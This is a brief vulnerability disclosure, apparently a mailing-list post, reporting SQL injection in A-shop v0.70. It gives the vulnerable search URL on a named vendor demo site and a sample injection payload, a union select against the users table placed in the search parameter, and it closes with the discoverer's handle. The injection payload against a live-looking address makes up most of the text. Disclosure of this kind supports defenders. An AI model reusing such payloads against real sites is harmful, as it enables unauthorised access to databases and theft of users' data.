Product : A-shop Version : v0.70 Vulnerability : SQL INJECTION
http://www.rammdev.com/ashop/demo/default.asp?mod=search&type=simple&q='SQLINJECTION'&cmdSearch=Search
Example ;
> > http://www.rammdev.com/ashop/demo/default.asp?mod=search&type=simple&q='unionselect%201,1,1,1%20from%20users'&cmdSearch=Search
<http://www.rammdev.com/ashop/demo/default.asp?mod=search&type=simple&q='union>
Thanks Broth3rhood [ ÇağLaR ] mail : [email protected]